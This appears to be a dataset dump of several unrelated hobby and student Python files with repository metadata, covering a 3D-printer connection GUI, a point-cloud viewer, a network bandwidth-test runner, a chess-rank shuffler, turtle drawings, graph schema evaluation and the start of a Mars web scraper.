self.timeLapsePaused:\n\t\t\tself.webcam.timelapsePause()\n\t\telse:\n\t\t\tself.webcam.timelapseResume()\n\t\t\n\t\tself.getTLStatus()\n\t\t\t\n\tdef doTimeLapseStop(self, evt):\n\t\tself.webcam.timelapseStop()\n\t\t\n\t\tself.bSnapShot.Enable(True)\n\t\tself.bTimeStart.Enable(True)\n\t\tself.lbCamPort.Enable(True)\n\t\tself.cbCamActive.Enable(True)\n\n\t\tself.bTimePause.Enable(False)\n\t\tself.bTimeStop.Enable(False)\n\t\t\n\t\tself.getTLStatus()\n\n\tdef loadConnections(self, cxlist):\n\t\tself.lbConnections.loadConnections(cxlist)\n\t\t\t\n\tdef isPendantActive(self):\n\t\treturn self.pendantActive\n\n\tdef doCamPort(self, evt):\n\t\tself.refreshCamPorts()\n\t\t\t\n\tdef refreshCamPorts(self):\n\t\tports = self.getCamPorts()\n\t\tself.lbCamPort.SetItems(ports)\n\n\t\tif len(ports) >= 1:\n\t\t\tself.lbCamPort.Enable(True)\n\t\t\tself.cbCamActive.Enable(True)\n\t\t\tif self.CameraPort is not None:\n\t\t\t\tif self.CameraPort in ports:\n\t\t\t\t\tself.lbCamPort.SetSelection(ports.index(self.CameraPort))\n\t\t\t\t\tself.cbCamActive.SetValue(True)\n\t\t\t\t\tself.camActive = True\n\t\t\t\t\tself.bSnapShot.Enable(True)\n\t\t\t\t\tself.bTimeStart.Enable(not self.timeLapseRunning)\n\t\t\t\telse:\n\t\t\t\t\tself.lbCamPort.SetSelection(0)\n\t\t\t\t\tself.cbCamActive.SetValue(False)\n\t\t\t\t\tself.camActive = False\n\t\t\t\t\tself.bSnapShot.Enable(False)\n\t\t\t\t\tself.bTimeStart.Enable(False)\n\t\t\telse:\n\t\t\t\tself.cbCamActive.SetValue(False)\n\t\t\t\tself.camActive = False\n\t\t\t\tself.bSnapShot.Enable(False)\n\t\t\t\tself.bTimeStart.Enable(False)\n\t\t\t\tself.lbCamPort.SetSelection(0)\n\t\telse:\n\t\t\tself.lbCamPort.Enable(False)\n\t\t\tself.cbCamActive.Enable(False)\n\t\t\tself.bSnapShot.Enable(False)\n\t\t\tself.bTimeStart.Enable(False)\n\t\t\tself.camActive = False\n\t\n\tdef getCamPorts(self):\n\t\tpl = glob.glob('/dev/video*')\n\t\treturn sorted(pl)\n\n\tdef checkCamActive(self, evt):\n\t\tself.camActive = evt.IsChecked()\n\t\tif self.camActive:\n\t\t\tport = \tself.lbCamPort.GetString(self.lbCamPort.GetSelection())\n\t\t\tself.bSnapShot.Enable(True)\n\t\t\tself.bTimeStart.Enable(not self.timeLapseRunning)\n\t\t\tself.lbCamPort.Enable(False)\n\t\t\tself.webcam.connect(port)\n\t\t\tp = self.getCamProperties()\n\t\t\tif not p is None:\n\t\t\t\tself.slSaturation.SetValue(p[0])\n\t\t\t\tself.vSaturation = p[0]\n\t\t\t\tself.slContrast.SetValue(p[1])\n\t\t\t\tself.vContrast = p[1]\n\t\t\t\tself.slBrightness.SetValue(p[2])\n\t\t\t\tself.vBrightness = p[2]\n\t\t\tself.CameraPort = port[:]\n\t\telse:\n\t\t\tself.bSnapShot.Enable(False)\n\t\t\tself.bTimeStart.Enable(False)\n\t\t\tself.lbCamPort.Enable(True)\n\t\t\tself.webcam.disconnect()\n\t\t\tself.CameraPort = None\n\n\tdef doSnapShot(self, evt):\n\t\tself.setCamProperties()\n\t\tpicfn = self.snapShot()\n\t\tif picfn is None:\n\t\t\tdlg = wx.MessageDialog(self, \"Error Taking Picture\",\n\t\t\t\t\t'Camera Error', wx.OK | wx.ICON_ERROR)\n\t\n\t\t\tdlg.ShowModal()\n\t\t\tdlg.Destroy()\n\t\telse:\n\t\t\ts = SnapFrame(self, picfn)\n\t\t\ts.Show()\n\t\t\t\n\tdef setCamProperties(self):\n\t\tvSat = self.slSaturation.GetValue()\n\t\tif vSat == self.vSaturation:\n\t\t\tvSat = None\n\t\telse:\n\t\t\tself.vSaturation = vSat\n\t\t\tvSat = float(vSat) / 100.0\n\t\t\t\n\t\tvCon = self.slContrast.GetValue()\n\t\tif vCon == self.vContrast:\n\t\t\tvCon = None\n\t\telse:\n\t\t\tself.vContrast = vCon\n\t\t\tvCon = float(vCon) / 100.0\n\t\t\t\n\t\tvBrt = self.slBrightness.GetValue()\n\t\tif vBrt == self.vBrightness:\n\t\t\tvBrt = None\n\t\telse:\n\t\t\tself.vBrightness = vBrt\n\t\t\tvBrt = float(vBrt) / 100.0\n\t\t\t\n\t\trc, xml = self.webcam.setProperties(vSat, vCon, vBrt)\n\t\t\n\t\t\t\n\tdef getCamProperties(self):\n\t\tif not self.camActive:\n\t\t\treturn None\n\t\t\n\t\trc, xml = self.webcam.getProperties()\n\t\tif not rc:\n\t\t\treturn None\n\t\t\n\t\txd = XMLDoc(xml).getRoot()\n\t\ttry:\n\t\t\tif str(xd.result) != \"success\":\n\t\t\t\treturn None\n\t\texcept AttributeError:\n\t\t\treturn None\n\t\t\n\t\ttry:\n\t\t\tsat = float(str(xd.properties.saturation))\n\t\texcept:\n\t\t\tsat = 0.125\n\t\t\n\t\ttry:\n\t\t\tcon = float(str(xd.properties.contrast))\n\t\texcept:\n\t\t\tcon = 0.125\n\t\t\n\t\ttry:\n\t\t\tbrt = float(str(xd.properties.brightness))\n\t\texcept:\n\t\t\tbrt = 0.5\n\t\t\t\n\t\treturn (int(sat * 100), int(con * 100), int(brt * 100))\n\t\t\t\n\tdef snapShot(self, block=True):\n\t\tif not self.camActive:\n\t\t\treturn None\n\t\t\n\t\trc, xml = self.webcam.picture(directory=\"pics\") # TODO - settings\n\t\tif not rc:\n\t\t\treturn None\n\t\t\t\n\t\txd = XMLDoc(xml).getRoot()\n\t\ttry:\n\t\t\treturn str(xd.filename)\n\t\texcept:\n\t\t\treturn None\n\t\n\tdef tick(self):\n\t\tif self.timeLapseRunning:\n\t\t\tself.tlTick -= 1\n\t\t\tif self.tlTick <= 0:\n\t\t\t\tself.tlTick = TLTICKRATE\n\t\t\t\tself.getTLStatus()\n\t\t\t\t\t\t\t\n\t\tcxlist = self.cm.getLists()[2]\n\t\tfor cx in cxlist:\n\t\t\tcx.tick()\n\t\t\t\n\tdef getTLStatus(self):\n\t\trc, xml = self.webcam.timelapseStatus()\n\t\tif not rc:\n\t\t\tself.timeLapseEnded()\n\t\telse:\n\t\t\txd = XMLDoc(xml).getRoot()\n\t\t\ttry:\n\t\t\t\tst = str(xd.result)\n\t\t\texcept AttributeError:\n\t\t\t\tself.timeLapseEnded()\n\t\t\telse:\n\t\t\t\tif st == \"idle\":\n\t\t\t\t\tself.timeLapseEnded()\n\t\t\t\telse:\n\t\t\t\t\titeration = int(str(xd.iterations))\n\t\t\t\t\tmaxIteration = int(str(xd.maxiterations))\n\t\t\t\t\tstatLine = st + \" - %d out of %d completed\" % (iteration, maxIteration)\n\t\t\t\t\tself.updateTimeLapseStatus(statLine)\n\n\t\n\tdef assertAllowPulls(self, flag):\n\t\tcxlist = self.cm.getLists()[2]\n\t\tfor cx in cxlist:\n\t\t\tcx.assertAllowPulls(flag)\n\t\t\n\tdef isAnyPrinting(self):\n\t\tcxlist = self.cm.getLists()[2]\n\t\tfor cx in cxlist:\n\t\t\tif cx.isPrinting():\n\t\t\t\treturn True\n\t\treturn False\n\n\tdef doPort(self, evt):\n\t\tself.refreshPorts()\n\t\t\n\tdef refreshPorts(self):\n\t\tports = self.cm.getLists(True)[1]\n\t\tself.lbPort.SetItems(ports)\n\t\tif len(ports) >= 1:\n\t\t\tself.bConnect.Enable(True)\n\t\t\tself.lbPort.Enable(True)\n\t\t\tself.lbPort.SetSelection(0)\n\t\telse:\n\t\t\tself.bConnect.Enable(False)\n\t\t\tself.lbPort.Enable(False)\n\t\t\t\n\t\tself.refreshCamPorts()\n\t\t\t\n\tdef getStatus(self):\n\t\treturn self.cm.getStatus()\n\t\t\t\n\tdef getTemps(self):\n\t\treturn self.cm.getTemps()\n\t\n\tdef pendantEvent(self, cmd):\n\t\tif cmd == \"pendant connected\":\n\t\t\t\tevt = PendantEvent(eid = PENDANT_CONNECT)\n\t\telif cmd == \"pendant disconnected\":\n\t\t\t\tevt = PendantEvent(eid = PENDANT_DISCONNECT)\n\t\telse:\n\t\t\t\tevt = PendantEvent(eid = PENDANT_COMMAND, cmdString=cmd)\n\t\ttry:\n\t\t\twx.PostEvent(self, evt)\n\t\texcept:\n\t\t\tpass\n\t\t\n\tdef pendantCommand(self, evt):\n\t\tif evt.eid == PENDANT_CONNECT:\n\t\t\tself.logger.LogMessage(\"Pendant connected\")\n\t\t\tself.pendantActive = True\n\t\t\tself.cm.activatePendant(True)\n\t\t\tconnections = self.cm.getLists()[2]\n\t\t\tself.loadConnections(connections)\n\n\t\telif evt.eid == PENDANT_DISCONNECT:\n\t\t\tself.logger.LogMessage(\"Pendant disconnected\")\n\t\t\tself.pendantActive = False\n\t\t\tconnections = self.cm.getLists()[2]\n\t\t\tself.loadConnections(connections)\n\t\telse:\n\t\t\tif TRACE:\n\t\t\t\tself.logger.LogMessage(evt.cmdString)\n\t\t\tself.cm.pendantCommand(evt.cmdString)\n\t\n\tdef doSetPendant(self, evt):\n\t\tif not self.pendantActive:\n\t\t\treturn\n\n\t\tcx = self.lbConnections.GetFirstSelected()\n\t\t\n\t\tself.cm.connectPendant(cx)\n\t\tconnections = self.cm.getLists()[2]\n\t\tself.loadConnections(connections)\n\n\tdef setPendant(self, cx):\n\t\tif not self.pendantActive:\n\t\t\treturn\n\t\t\n\t\tself.cm.connectPendant(cx)\n\t\tconnections = self.cm.getLists()[2]\n\t\tself.loadConnections(connections)\n\n\tdef doDisconnect(self, evt):\n\t\titem = self.lbConnections.GetFirstSelected()\n\t\tif item == -1:\n\t\t\tif self.cm.connectionCount() == 1:\n\t\t\t\titem = 0\n\t\t\telse:\n\t\t\t\tdlg = wx.MessageDialog(self, \"Please choose a connection to disconnect\",\n\t\t\t\t\t'No Connection Selected', wx.OK | wx.ICON_ERROR)\n\t\t\t\tdlg.ShowModal()\n\t\t\t\tdlg.Destroy()\n\t\t\t\treturn\n\t\t\n\t\tcxtext = self.lbConnections.GetItemText(item)\n\t\ttry:\n\t\t\tprtr = cxtext.split()[0]\n\t\t\tif prtr == \"*\":\n\t\t\t\ttry:\n\t\t\t\t\tprtr = cxtext.split()[1]\n\t\t\t\texcept:\n\t\t\t\t\tprtr = None\n\t\texcept:\n\t\t\tprtr = None\n\n\t\tif prtr is not None:\n\t\t\tcx = self.cm.connectionByPrinter(prtr)\n\t\t\tif cx is not None:\n\t\t\t\tif cx.isPrinting():\n\t\t\t\t\tif self.pgConnMgr.isAnyPrinting():\n\t\t\t\t\t\tdlg = wx.MessageDialog(self, \"Are you sure you want to disconnect printer %s while it is active\" % prtr,\n\t\t\t\t\t\t\t\t\t\t\t'Printing Active', wx.YES_NO | wx.NO_DEFAULT | wx.ICON_INFORMATION)\n\t\t\t\n\t\t\t\t\t\trc = dlg.ShowModal()\n\t\t\t\t\t\tdlg.Destroy()\n\t\t\n\t\t\t\t\t\tif rc != wx.ID_YES:\n\t\t\t\t\t\t\treturn\n\t\t\t\tself.disconnectByPrinter(prtr)\n\n\tdef disconnectByPrinter(self, prtr):\t\t\t\n\t\tif self.cm.disconnectByPrinter(prtr):\n\t\t\t(printers, ports, connections) = self.cm.getLists()\n\t\t\tself.lbPort.SetItems(ports)\n\t\t\tself.lbPort.SetSelection(0)\n\t\t\tself.lbPrinter.SetItems(printers)\n\t\t\tself.lbPrinter.SetSelection(0)\n\t\t\tif len(ports) > 0 and len(printers) > 0:\n\t\t\t\tself.bConnect.Enable(True)\n\t\t\tif len(connections) == 0:\n\t\t\t\tself.bDisconnect.Enable(False)\n\t\t\t\tself.bReset.Enable(False)\n\t\t\tself.loadConnections(connections)\n\t\t\t\t\n\n\tdef doConnect(self, evt):\n\t\tport = \tself.lbPort.GetString(self.lbPort.GetSelection())\n\t\tbaud = \tself.lbBaud.GetString(self.lbBaud.GetSelection())\n\t\tprinter = \tself.lbPrinter.GetString(self.lbPrinter.GetSelection())\n\t\t\n\t\tif self.settings.resetonconnect:\n\t\t\tself.resetPort(port)\n\t\t\t\n\t\tif not self.cm.connect(printer, port, baud):\n\t\t\treturn\n\n\t\t(printers, ports, connections) = self.cm.getLists()\n\t\tself.lbPort.SetItems(ports)\n\t\tif len(ports) == 0:\n\t\t\tself.bConnect.Enable(False)\n\t\telse:\n\t\t\tself.lbPort.SetSelection(0)\n\t\tself.lbPrinter.SetItems(printers)\n\t\tif len(printers) == 0:\n\t\t\tself.bConnect.Enable(False)\n\t\telse:\n\t\t\tself.lbPrinter.SetSelection(0)\n\t\tself.loadConnections(connections)\n\t\tself.bDisconnect.Enable(True)\n\t\tself.bReset.Enable(True)\n\t\t\n\tdef resetPort(self, port):\n\t\tif _platform == \"linux\" or _platform == \"linux2\":\n\t\t\ttry:\n\t\t\t\tfp = open(port, \"r\")\n\t\t\t\tnew = termios.tcgetattr(fp)\n\t\t\t\tnew[2] = new[2] | ~termios.CREAD\n\t\t\t\ttermios.tcsetattr(fp, termios.TCSANOW, new)\n\t\t\t\tfp.close()\n\t\t\texcept:\n\t\t\t\tpass\n\t\t\n\tdef onClose(self):\n\t\tself.webcam.exit()\n\t\tself.cm.disconnectAll()\n\t\tself.bDisconnect.Enable(False)\n\n\tdef doReset(self, evt):\n\t\titem = self.lbConnections.GetFirstSelected()\n\t\tif item == -1:\n\t\t\tif self.cm.connectionCount() == 1:\n\t\t\t\titem = 0\n\t\t\telse:\n\t\t\t\tdlg = wx.MessageDialog(self, \"Please choose a connection to reset\",\n\t\t\t\t\t'No Connection Selected', wx.OK | wx.ICON_ERROR)\n\t\t\t\tdlg.ShowModal()\n\t\t\t\tdlg.Destroy()\n\t\t\t\treturn\n\t\t\t\n\t\tconnections = self.cm.getLists()[2]\n\t\tcx = connections[item]\n\n\t\tcxtext = self.lbConnections.GetItemText(item)\n\t\ttry:\n\t\t\tprtr = cxtext.split()[0]\n\t\t\tif prtr == \"*\":\n\t\t\t\ttry:\n\t\t\t\t\tprtr = cxtext.split()[1]\n\t\t\t\texcept:\n\t\t\t\t\tprtr = \"\"\n\t\texcept:\n\t\t\tprtr = \"\"\n\n\n\t\tif cx.reprap is not None:\n\t\t\tdlg = wx.MessageDialog(self, \"Are you sure you want to reset printer %s\" % prtr,\n\t\t\t\t\t\t\t\t'Printer Reset', wx.YES_NO | wx.NO_DEFAULT | wx.ICON_INFORMATION)\n\t\t\n\t\t\trc = dlg.ShowModal()\n\t\t\tdlg.Destroy()\n\n\t\t\tif rc == wx.ID_YES:\n\t\t\t\tcx.reprap.reset()\n\t\t\t\tif cx.prtmon is not None:\n\t\t\t\t\tcx.prtmon.printerReset()\n\nclass ActiveConnectionCtrl(wx.ListCtrl):\t\n\tdef __init__(self, parent, images):\n\t\t\n\t\tf = wx.Font(12, wx.FONTFAMILY_SWISS, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_BOLD)\n\t\tdc = wx.ScreenDC()\n\t\tdc.SetFont(f)\n\t\tfontHeight = dc.GetTextExtent(\"Xy\")[1]\n\t\t\n\t\tcolWidths = [150, 200]\n\t\tcolTitles = [\"Printer\", \"Port\"]\n\t\t\n\t\ttotwidth = 20;\n\t\tfor w in colWidths:\n\t\t\ttotwidth += w\n\t\t\n\t\twx.ListCtrl.__init__(self, parent, wx.ID_ANY, size=(totwidth, fontHeight*(VISIBLELISTSIZE+1)),\n\t\t\tstyle=wx.LC_REPORT|wx.LC_VIRTUAL|wx.LC_HRULES|wx.LC_VRULES|wx.LC_SINGLE_SEL\n\t\t\t)\n\n\t\tself.parent = parent\t\t\n\t\tself.il = wx.ImageList(16, 16)\n\t\tself.il.Add(images.pngNopendant)\n\t\tself.il.Add(images.pngPendant)\n\t\tself.SetImageList(self.il, wx.IMAGE_LIST_SMALL)\n\n\t\tself.cxList = []\n\t\t\n\t\tself.SetFont(f)\n\t\tfor i in range(len(colWidths)):\n\t\t\tself.InsertColumn(i, colTitles[i])\n\t\t\tself.SetColumnWidth(i, colWidths[i])\n\t\t\n\t\tself.SetItemCount(0)\n\t\t\n\t\tself.Bind(wx.EVT_LIST_ITEM_ACTIVATED, self.doSetPendant)\n\t\t\n\tdef doSetPendant(self, evt):\n\t\tsx = self.GetFirstSelected()\n\t\tif sx == -1:\n\t\t\treturn\n\t\tself.parent.setPendant(sx)\n\t\n\tdef loadConnections(self, cxList):\n\t\tself.cxList = cxList\n\t\tself.SetItemCount(len(cxList))\n\t\tself.Refresh()\n\t\n\tdef OnGetItemText(self, item, col):\n\t\tif col == 0:\n\t\t\treturn self.cxList[item].printer\n\t\telif col == 1:\n\t\t\treturn self.cxList[item].port\n\t\telse:\n\t\t\treturn \"\"\n\n\tdef OnGetItemImage(self, item):\n\t\tif self.parent.isPendantActive() and self.cxList[item].hasPendant():\n\t\t\treturn 1\n\t\telse:\n\t\t\treturn 0\n\t\n\tdef OnGetItemAttr(self, item):\n\t\treturn None\n","repo_name":"jbernardis/reprapnb","sub_path":"src/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":34035,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"28093461473","text":"import vtk\nimport numpy as np\nimport laspy\nimport vtk.util.numpy_support as vtk_np\n# import open3d as o3d\n\n\npc = laspy.read('C:/Users/tanne/Desktop/VisualizationFinalProjectData/Mawchu_LLacta_UTM.las')\n# pc = laspy.read('2.las')\n\npc_array = np.vstack([pc.x, pc.y, pc.z]).transpose()\n# pc_array = pc_array[::100] # Randomly reducing the points \n # by a factor of 100\nprint(pc_array.shape)\nprint(pc_array[0])\n\ncolors = np.vstack([pc.red/2**16, pc.green/2**16, pc.blue/2**16]).transpose()\n\nnCoords = pc_array.shape[0]\nnElem = pc_array.shape[1]\n\nverts = vtk.vtkPoints()\ncells = vtk.vtkCellArray()\nscalars = None\n\npd = vtk.vtkPolyData()\n\nverts.SetData(vtk_np.numpy_to_vtk(pc_array))\n\ncells_npy = np.vstack([np.ones(nCoords,dtype=np.int64),\n np.arange(nCoords,dtype=np.int64)]).T.flatten()\nprint(cells_npy.shape)\n\ncells.SetCells(nCoords,vtk_np.numpy_to_vtkIdTypeArray(cells_npy))\n\npd.SetPoints(verts)\npd.SetVerts(cells)\npd.GetPointData().SetScalars(vtk_np.numpy_to_vtk(colors))\n\nmapper = vtk.vtkPolyDataMapper()\nmapper.SetInputDataObject(pd)\nmapper.SetColorModeToDirectScalars()\n\nactor = vtk.vtkActor()\nactor.SetMapper(mapper)\nactor.GetProperty().SetRepresentationToPoints()\n\nren = vtk.vtkRenderer()\nren.AddActor(actor)\n\nwindow = vtk.vtkRenderWindow()\nwindow.AddRenderer(ren)\n# window.SetSize(1000,1000)\n\ninteractor =vtk.vtkRenderWindowInteractor()\ninteractor.SetRenderWindow(window)\ninteractor.Initialize()\n\nwindow.Render()\ninteractor.Start()","repo_name":"nikhilmakkar/CS530FinalProject","sub_path":"scratch/FinalProject.py","file_name":"FinalProject.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"34575016343","text":"import json\nimport time\nimport logging\nimport threading\nimport os\nimport glob\n\nfrom bandwidth_src.bandwidth_test import bandwidth_test\nfrom utils.enums import image_roles\nfrom utils.file_utils import file_exists\n\n\nhost_name = \"host1\"\n\ntry:\n host_name = os.environ['HOSTNAME']\nexcept KeyError as e:\n pass\n\ntry:\n if host_name == \"host1\":\n host_name = os.environ['USER']\nexcept KeyError as e:\n pass\n\n\n\nBANDWIDTH_TEST_IDENTIFIER = \".b_test.json\"\n\n\nlogger = logging.getLogger(__name__)\n\nfh = logging.FileHandler('test_output.log')\nfh.setLevel(logging.DEBUG)\n\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nfh.setFormatter(formatter)\n\nlogger.addHandler(fh)\n\n\nALREADY_TESTED_FILES = set()\n\ndef get_bandwidth_test_config():\n try:\n test_files = glob.glob(\"*.b_test.json\")\n file_name = test_files[0]\n ALREADY_TESTED_FILES.add('file_name')\n test_file = open(file_name, \"r\")\n bandwidth_tests = json.load(test_file)\n test_file.close()\n except FileNotFoundError as e:\n print(e)\n exit()\n return bandwidth_tests\n\n\ndef poll_for_bandwidth_test_config():\n while True:\n test_files = glob.glob(\"*.b_test.json\")\n if len(test_files) > 0:\n break\n\ndef execute_tests(bandwidth_tests):\n global host_name\n config = bandwidth_tests['config']\n threads = list()\n try:\n for test in bandwidth_tests['tests']:\n b_test = bandwidth_test(\n test['server'],\n test['client'],\n test['output_file_name'],\n test['port'],\n test['time'])\n\n if b_test.server == host_name:\n if 'concurrent' in config and config['concurrent']:\n # run as thread\n logger.warning(f\"starting server thread for {b_test.server}. client is {b_test.client}\")\n x = threading.Thread(target=b_test.run_server, args=())\n x.start()\n threads.append(x)\n else:\n logger.warning(f\"running server test for {b_test.server}. client is {b_test.client}\")\n b_test.run_server()\n logger.warning(f\"done with server test for {b_test.server}. output file is {b_test.output_file_name}\")\n elif b_test.client == host_name:\n if 'concurrent' in config and config['concurrent']:\n # run as thread\n logger.warning(f\"started client thread for {b_test.client}. server is {b_test.server}\")\n y = threading.Thread(target=b_test.run_client, args=())\n y.start()\n threads.append(y)\n else:\n logger.warning(f\"running client for {b_test.client}. server is {b_test.server}\")\n b_test.run_client()\n logger.warning(f\"done with client test for {b_test.client}. server was {b_test.server}\")\n elif 'stagger' in config and config['stagger']:\n logger.warning(f\"sleeping for test\")\n time.sleep(b_test.time)\n \n except Exception as e:\n logger.warning(f\"Error running tests. let's log e. {e}\")\n\n logger.warning(\"Done with all bandwidth tests\")\n for th in threads:\n th.join()\n logger.warning(\"all bandwidth tests are joined\")\n\n\n\ndef run_bandwidth_test():\n poll_for_bandwidth_test_config()\n bandwidth_test_config = get_bandwidth_test_config()\n execute_tests(bandwidth_test_config)\n # give me time to get bandwidth tests out of files\n time.sleep(1000)\n\n","repo_name":"Tmonster/fogify-evaluation","sub_path":"images/ping_image/bandwidth_src/run_bandwidth.py","file_name":"run_bandwidth.py","file_ext":"py","file_size_in_byte":3651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"33356887635","text":"class RandomChess:\n \"\"\"\n RandomChess is a class for creating random first rank according to a certain random mode which\n specifies the rules with which the randomly shuffled peices should be situated\n \"\"\"\n \n import random\n \n def __init__(self):\n # firstRank=['rookKingSide','knightKingSide','bishopKingSide','king','queen','bishopQueenSide','knightQueenSide','rookQueenSide']\n # firstRank=[u'\\u2656'.encode('utf-8'),u'\\u2658'.encode('utf-8'),u'\\u2657'.encode('utf-8'),u'\\u2654'.encode('utf-8'),\n# u'\\u2655'.encode('utf-8'),u'\\u2657'.encode('utf-8'),u'\\u2658'.encode('utf-8'),u'\\u2656'.encode('utf-8')]\n self._firstRank=['♖','♘','♗','♔','♕','♗','♘','♖']\n self._ShuffledFirstRank={'firstRank':['♖','♘','♗','♔','♕','♗','♘','♖'],\n 'state':{'KingPos':3,'RookPos':[0,7],'BishopPos':[2,5]}}\n @property \n def ShuffledFirstRank(self): \n print('getting ShuffledFirstRank...')\n return self._ShuffledFirstRank\n \n def ShuffleFirstRank(self,RandomMode=None):\n l=self._ShuffledFirstRank['firstRank']\n n=len(l)\n RookfirstPos=-1\n RooksecPos=-1\n kingPos=-1\n bishopFirstPos=-1\n bishopSecPos=-1\n\n for i in range(n):\n\n indRandom=random.randint(i,n-1)\n l[indRandom],l[i]=l[i],l[indRandom]\n\n p=l[i]\n \n if p==self._firstRank[0] and RookfirstPos>=0:\n RooksecPos=i\n elif p==self._firstRank[0]:\n RookfirstPos=i\n elif p==self._firstRank[2] and bishopFirstPos>=0:\n bishopSecPos=i\n elif p==self._firstRank[2]:\n bishopFirstPos=i\n elif p==self._firstRank[3]:\n kingPos=i\n \n self._ShuffledFirstRank['state']['KingPos']=kingPos\n self._ShuffledFirstRank['state']['RookPos']=[RookfirstPos,RooksecPos]\n self._ShuffledFirstRank['state']['BishopPos']=[bishopFirstPos,bishopSecPos]\n \n if RandomMode is not None:\n if RandomMode=='Fischer':\n if not ((bishopFirstPos+bishopSecPos)% 2==1 and kingPos>RookfirstPos and kingPos<RooksecPos):\n \n self._ShuffledFirstRank={'firstRank':['♖','♘','♗','♔','♕','♗','♘','♖'],\n 'state':{'KingPos':3,'RookPos':[0,7],'BishopPos':[2,5]}}\n else: \n return False\n return True\n \n def printFirstRank(self):\n print(repr(self._ShuffledFirstRank['firstRank']).decode('string-escape'))","repo_name":"hmazidi/random_chess","sub_path":"RandomChess.py","file_name":"RandomChess.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"31649571538","text":"# Draw a snowman and snowflake using recursion\n\n\nimport turtle\n\n\ndef snowman(size, x, y):\n if size < 60: # Base case\n return\n turtle.penup()\n turtle.goto(x, y)\n turtle.pendown()\n turtle.circle(size)\n\n # Recursive calls\n snowman(size*0.8, x, y+size*1.2)\n snowman(size*0.6, x, y+size*2.2)\n\n\ndef snowflake(size):\n if size < 5: # Base case\n return\n for i in range(6):\n turtle.forward(size)\n snowflake(size/3) # Recursive call\n turtle.backward(size)\n turtle.right(60) # Rotate 60 degrees\n\n\n# Background and pen settings\nturtle.speed(0)\nturtle.ht()\nturtle.bgcolor(\"light blue\")\nturtle.color(\"white\")\nturtle.pensize(2)\n\n# Draw snowman\nsnowman(100, 0, -100)\n\n# Draw snowflake\nturtle.penup()\nturtle.goto(-300, 300)\nturtle.pendown()\nfor i in range(6):\n snowflake(100)\n turtle.right(60)\n\nturtle.done()\n","repo_name":"ahkim3/IT-4401","sub_path":"Module 10/Recursion/recursion.py","file_name":"recursion.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"44251788386","text":"from Schema import *\nfrom GraphGenerator import *\n# check if each edge type have exactly one source type\n# and one target type in nodetypeset\ndef validateEdgetypeOfSchema(sc,mode='is'):\n for et in sc.edgetypeset.edgetypes:\n src = tar = 0\n if sc.nodetypeset.nodetypes.count(et.src_type) == 1 and \\\n sc.nodetypeset.nodetypes.count(et.target_type) == 1:\n continue\n for nt in sc.nodetypeset.nodetypes:\n if mode=='is':\n if nt is et.src_type:\n src += 1\n if nt is et.target_type:\n tar += 1\n elif mode.lower()=='l' or mode=='label' :\n if nt.equalLabels( et.src_type ):\n src += 1\n if nt.equalLabels( et.target_type ):\n tar += 1\n if src != 1 or tar != 1:\n return False\n return True\n\n\ndef findWithIs(li, e):\n if li.count(e) == 1:\n return li.index(e)\n for i, v in enumerate(li):\n if v is e:\n return i\n print(e, 'not found')\n\n\ndef getGraphFromSchema(sc):\n if validateEdgetypeOfSchema(sc) == False:\n print('the schema has problem with edge types, not matching node types')\n return\n g = nx.MultiGraph()\n g.add_nodes_from([(index, nt.attributes) for index, nt in enumerate(sc.nodetypeset.nodetypes)])\n edge_type_list = []\n for et in sc.edgetypeset.edgetypes:\n src = findWithIs(sc.nodetypeset.nodetypes, et.src_type)\n tar = findWithIs(sc.nodetypeset.nodetypes, et.target_type)\n edge_type_list.append((src, tar, et.attributes))\n g.add_edges_from(edge_type_list)\n return g\n\n\ndef node_subst_cost(n1, n2):\n cost = 0\n if set(n1).issuperset(set(n2)):\n cost = 0\n else:\n cost = len(set(n2) - set(n1)) / len(set(n2))\n return cost\n\n\ndef edge_subst_cost(e1, e2):\n if set(e1) == set(e2):\n return 0\n return 1\n\ndef computeGEDscore(gt_sc, sc):\n sc_G = getGraphFromSchema(gt_sc)\n scgen_G = getGraphFromSchema(sc)\n result = nx.algorithms.similarity.optimize_graph_edit_distance(scgen_G, sc_G, \\\n node_subst_cost=node_subst_cost,edge_subst_cost=edge_subst_cost)\n print('proximating GED')\n for i in result:\n print('score: ',i)\n print('done')","repo_name":"zhengfeitian/SchemaExtraction","sub_path":"Evaluation.py","file_name":"Evaluation.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"28224994404","text":"import datetime as dt\nfrom bs4 import BeautifulSoup as soup \nfrom splinter import Browser\nimport pandas as pd\nfrom webdriver_manager.chrome import ChromeDriverManager\n\n\ndef scrape_all():\n # executable_path = {\"executable_path\": \"/Users/ON054440/code/chromedriver\"}\n executable_path = {'executable_path': ChromeDriverManager().install()}\n browser = Browser(\"chrome\", **executable_path, headless=False)\n\n\n # Visit the mars nasa news site\n url = 'https://redplanetscience.com/'\n browser.visit(url)\n\n # Optional delay for loading the page\n browser.is_element_present_by_css('div.list_text', wait_time=1)\n\n # Convert the browser html to a soup object and then quit the browser\n html = browser.html\n news_soup = soup(html, 'html.parser')\n\n slide_elem = news_soup.select_one('div.list_text')\n\n\n # Use the parent element to find the first a tag and save it as `news_title`\n news_title = slide_elem.find('div', class_='content_title').get_text()\n\n # Use the parent element to find the paragraph text\n news_paragraph = slide_elem.find('div', class_='article_teaser_body').get_text()\n\n # JPL Space Images\n\n # Visit URL\n url = 'https://spaceimages-mars.com'\n browser.visit(url)\n\n # Find and click the full image button\n full_image_elem = browser.find_by_tag('button')[1]\n full_image_elem.click()\n\n # Parse the resulting html with soup\n html = browser.html\n img_soup = soup(html, 'html.parser')\n\n # find the relative image url\n img_url_rel = img_soup.find('img', class_='fancybox-image').get('src')\n\n # Use the base url to create an absolute url\n featured_image = f'https://spaceimages-mars.com/{img_url_rel}'\n\n\n # Mars Facts\n\n df = 